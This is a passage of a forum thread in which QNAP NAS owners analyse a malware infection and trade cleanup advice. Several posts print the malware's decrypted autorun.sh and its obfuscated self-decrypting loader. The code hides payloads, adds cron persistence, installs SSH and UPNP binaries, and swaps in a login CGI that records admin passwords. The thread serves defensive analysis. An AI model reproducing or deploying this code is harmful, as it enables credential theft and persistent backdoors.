"${bdir}/.${ipath}/${file}"; } done chmod 755 "${bdir}/.${ipath}/${sshbin}" chmod 755 "${bdir}/.${ipath}/${upnpbin}" grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && { ! test -d "${bdir}/.log" && mkdir "${bdir}/.log" ! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh POSTDATA="" test "x${REQUEST_METHOD}" = xPOST && { case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac; $REMOTE_ADDR:$POSTDATA EOF } test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && { case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0 } if ! test -z "$POSTDATA"; then exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc $POSTDATA V4KLDmYwvc else exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi fi exit 0' > /home/httpd/cgi-bin/_authLogin.cgi test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi } . "${bdir}/.${ipath}/${crons}.sh" cd "${sdir}" rm -rf "${tdir}" test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & } true; } #]
The Router is an ISP router, the nas is a QNAP nas, all software are up-to-date, the malware vehicle is one of the nas services. I exposed the nas to the network with 2fa strong password ecc ecc but it was not enough.
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Do you have music station installed and enabled?benzo83 wrote:not too cheap 300euro :/dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Hi MouseTick,Mousetick wrote:This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:Code: Select all
#!/bin/sh export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin" command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; } test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; } command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\ \['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\ //I;s/\(^\|\ \)\[[^\ ]\+\]\ .*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; } bdir= test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done; test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1` test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done; test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; } arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm` upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR") cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB") sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT") sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb") sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox") sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH") archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn") archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr") ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB") crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY") arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"` test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || { mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } __BOOT_DEV= __model=`getcfg System "Internal Model"` CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf` CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf` CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf` __BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; } command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); } test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6" test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; } for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; } test "$noex" = 1 || { rm "${bdir}/.BOOT_TIME" rm .BOOT_TIME test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}" tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"` test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done; test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd` cp "${arch}" ${tdir} cd ${tdir} tar -xzf "${arch}" grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; } EOF test "$fgrep" || fgrep=grep test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}" test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}" test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; } cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; } chmod 755 "${bdir}/.${ipath}/${crons}.sh" if [ -f "${confdir}/crontab" ]; then test "$RANDOM" || RANDOM=12499 test $(( $RANDOM & 1 )) = 0 && space=' ' || space='' cronmins="$(( $RANDOM % 4 ))" test ! "$cronmins" -eq 0 && cronmins="${cronmins}0" $fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; } fi for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done chmod 755 "${bdir}/.${ipath}/${sshbin}" chmod 755 "${bdir}/.${ipath}/${upnpbin}" grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && { ! test -d "${bdir}/.log" && mkdir "${bdir}/.log" ! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh POSTDATA="" test "x${REQUEST_METHOD}" = xPOST && { case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac; $REMOTE_ADDR:$POSTDATA EOF } test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && { case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0 } if ! test -z "$POSTDATA"; then exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc $POSTDATA V4KLDmYwvc else exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi fi exit 0' > /home/httpd/cgi-bin/_authLogin.cgi test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi } . "${bdir}/.${ipath}/${crons}.sh" cd "${sdir}" rm -rf "${tdir}" test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & } true; } #]
Thanks for the reply! Can you tell us how to "decrypt" the shell script? Id like to look into mine and see if I can find anything myself.
I don't get the point why to disconnect from LAN?
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Also another question, is the following cron job save:
*/5 * * * * /mnt/ext/opt/apache/bin/php /mnt/ext/opt/qdesk/www/public/index.php cli watchdog woof
*/5 * * * * /mnt/ext/opt/apache/bin/php /mnt/ext/opt/qdesk/www/public/index.php cli watchdog woof
-
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
unfortunately i dosomy1982 wrote:Do you have music station installed and enabled?benzo83 wrote:not too cheap 300euro :/dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
- Don
- Guru
- Posts: 12289
- Joined: Thu Jan 03, 2008 4:56 am
- Location: Long Island, New York
Re: Strange folders and cronjobs
You disconnect from the LAN to protect other devices on the LAN from being compromised by the NAS infection.
Use the forum search feature before posting.
Use RAID and external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced, and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.
NAS: TVS-882BR | F/W: 5.0.1.2346 | 40GB | 2 x 1TB M.2 SATA RAID 1 (System/VMs) | 3 x 1TB M.2 NMVe QM2-4P-384A RAID 5 (cache) | 5 x 14TB Exos HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-h674 | F/W: 5.0.1.2376 | 16GB | 3 x 18TB RAID 5
Apps: DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS3, Entware, DLstation, VS, +
Use RAID and external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced, and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.
NAS: TVS-882BR | F/W: 5.0.1.2346 | 40GB | 2 x 1TB M.2 SATA RAID 1 (System/VMs) | 3 x 1TB M.2 NMVe QM2-4P-384A RAID 5 (cache) | 5 x 14TB Exos HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-h674 | F/W: 5.0.1.2376 | 16GB | 3 x 18TB RAID 5
Apps: DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS3, Entware, DLstation, VS, +
-
- Experience counts
- Posts: 1081
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
The only way to decrypt the script is to execute it because it is self-decrypting. Since executing it to completion is harmful, it needs to be surgically edited to keep the decryption part but disable the harmful part. That part changes from script to script so it's not easy to give general instructions. Also some scripts are encrypted with multiple passes, so the neutering process needs to be applied several times.somy1982 wrote:Can you tell us how to "decrypt" the shell script? Id like to look into mine and see if I can find anything myself.
I greatly discourage you try to do this if you don't understand fully what I just said and what follows.
Example: autorun.sh posted by benzo83. Look for the note "<<<<<<<<<<============ DANGEROUS PART HERE" (added by me).
Code: Select all
#!/bin/sh
WDsKwcX=${NfPe}tr${TOtnQoPZlj}$XtvYzUmXi$'';XlvTWbP=$HwyETG$""${BOQDRIBofeJvZ}\\$KcLJmW$""${mBgBLqNugLIeP};WHJRnC=${AfESPMztIUpwo}${ayhM}${ifMZuHyfid}${XlvTWbP}1${ORdB}3${naPAXdYJve}3$nXrwvwbgB$'';HAFPgiL=${IQcueXfGmyiCy}${oUpr}${yVUyYguMwM}${XlvTWbP}0${cZew}5${NvQVndODqz}5$pDkAgrLTF$'';TQzLfG=${tfBBVkrxivfHq}${HJzN}${lDvZlgOBlx}${XlvTWbP}1${ybgg}3${oMdRZIuYWi}4$vcMuhGGuT$'';$WDsKwcX 'Cmi`BLh}Xfrg&vH+AjZKS'$WHJRnC't>]IV)YkTqz*QyPG{aN!OMR<cd '$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E' << "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
E>/fJ%/Cc|mBnkq\]x[d=em$$mjlMXT&VRmjYFOf+Oc*CIN&ABwsVmjB+z\A!M+\F)[`+&RABwszI}mj-#uVK[fG&}k%nmj}} V-cD&wsmrL-62r)JWVJ%mjOX)R+&wsVOmjlzx`kPAuAUk&)BmjNNI%tz&wsmjO!)I++`R&(kWCBws)%CBmjTn=cqz-PRU)c&mj*MZ\FB bWzqxW&mjJ"TBefqA&Vwsmj+kKV&)mrL-6BrCBVmjq-OMPTn&mjT()}N`Cu*&wsmjNYC]xc&B\mrL-61rWmj=xJOY*ZlWM&ws(mjK`n(bQKcY&kWCBwsmjx
...remainder omitted for brevity...
Code: Select all
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
Code: Select all
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg"
Code: Select all
#!/bin/sh
$edaDvWOGKQH$""${CBNj}ty${JLrbRrhksoP}pe; t${eRcvpXBRvLuGVR}ype; com${xzEtMGbZ}mand${mmwtxhS}; $'\x62'uiltin${rNuyR}; tr${CcOVaqpEpUa}ue${PPonIc}; ${rXuoRRVy}false; unse${jdQhDcxqyUuh}${kBgvLewYlcDOl}${iAjeHbDp}t; ${RaMt}u$'\x6e'set${DxrBqjd}${jfumPVsEk}; ${PJsWOh}ev$'\x61'l${QOirJkgClB}; f${MVdfYFMhJ}alse; ${OwPbFgfCcHez}true; ${gcnlvMgKyJkNGy}$NpMsQSqXOMZ$''tes${VgejCHV}t; built${DsvVSOxeL}in; tr${SWtFlC}u${IcVJWwRLDBRDzF}$'\x65'${FYSAdkVijlD}; bu${OlJXwPpysLfOASB}${LGAY}${bGmFDmYdf}iltin; e$'\x76'a${dFhi}l${DxZfBKVfqtKS}; ${kWUAWXU}test; ${BualwUBF}builtin${kRKh}; $leEfFdMWUbFN$''uns${QzedDJQNeCz}e${HwPRGWnmjT}t; fal${tptQnbfJGUNApw}s${qPZqCftUdfd}e${mMNoReiqZIgL}; RxlSjPq=${JlEHKYwjrbodO}${xnxikuGpqHU}${DLlkJFP}tr; eVBTQyl=${JJRQ}${pksLKRdIF}\\${DpBH}${THSiqOYSU}; UVeZowLy=${mgMhJWRtg}${sytoKQCeJvGkIDw}$pctXOoTogzS$""${eVBTQyl}${IjiHrQctVyNBIdm}$wSiulfNuqQa$""13${LKaC}3; qewuHlK=${hAMbPTKJn}${oFzvTGoyZiAPyve}$eYjAzJvmNqy$""${eVBTQyl}${PphAxrnCnZWgzsz}$vIJVuAccEvM$""05${Ibid}5; gysIyg=${nLAzJEmiz}${ejCYiEfvQIJaqIU}$ovYxEfMaCWf$""${eVBTQyl}${XKvJYQlviynEHGt}$VSdvNePfJbJ$""13${IImJ}4; $RxlSjPq 's;t{CMau+&L`b'"'"'B!HfZwrld$VY'$gysIyg''$qewuHlK'Xy|Um)cN'$UVeZowLy']Ti* JIh<SW"\nRQkoO=(%}v#q>EzjKGFePgpAxDn' 'RjUOHgyV}ep%XQwkqi+ Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<= ========= DANGEROUS PART HERE
eG/qfl/%=y&WLDAgw*>ECihjx*>EC+:/qfl:/%qfl:/K%A/qfl:/K%A/%qfl:/K%A/qfl/b11:/K%A/SDJ$S/%qfl:/K%A/SDJ$S/qflhyJDUU$l)w(-w)fAl$U&wY/)&-/lKSSw2Y<1wmmw)fAl$U&wopwxwg&%gw(|whj1hw<<w&J=Dwh.hw<<wA&gKAlQwSDJ$SwAihjx1`hjx1eedzG/
+h+hQwJ$%&wjAwflw/dzG/
d/dmzG/
d/dpwAihjxA`/d+hQw&J=DwhjxA`hjxAeedzG/
... remainder omitted for brevity ...
Code: Select all
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<========== DANGEROUS PART HERE
Code: Select all
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"
Code: Select all
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
... remainder omitted for brevity ...
As an extra precaution without knowing the source or the means by which the NAS was infected. In a way that's putting the NAS, which in benzo83's case may be running SSH & UPNP backdoors and who knows what else, under quarantine.I don't get the point why to disconnect from LAN?
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Check all apps under .qpkg folder - reinstall them all if you can. I found many sh scripts infected. Also the ones malware remover claimed recovered!! When exactly on 25/8 did the file created? Mine wa around 9am Europe time.benzo83 wrote:unfortunately i dosomy1982 wrote:Do you have music station installed and enabled?benzo83 wrote:not too cheap 300euro :/dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
-
- Experience counts
- Posts: 1081
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
You do not have the required permissions to view the files attached to this post.
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
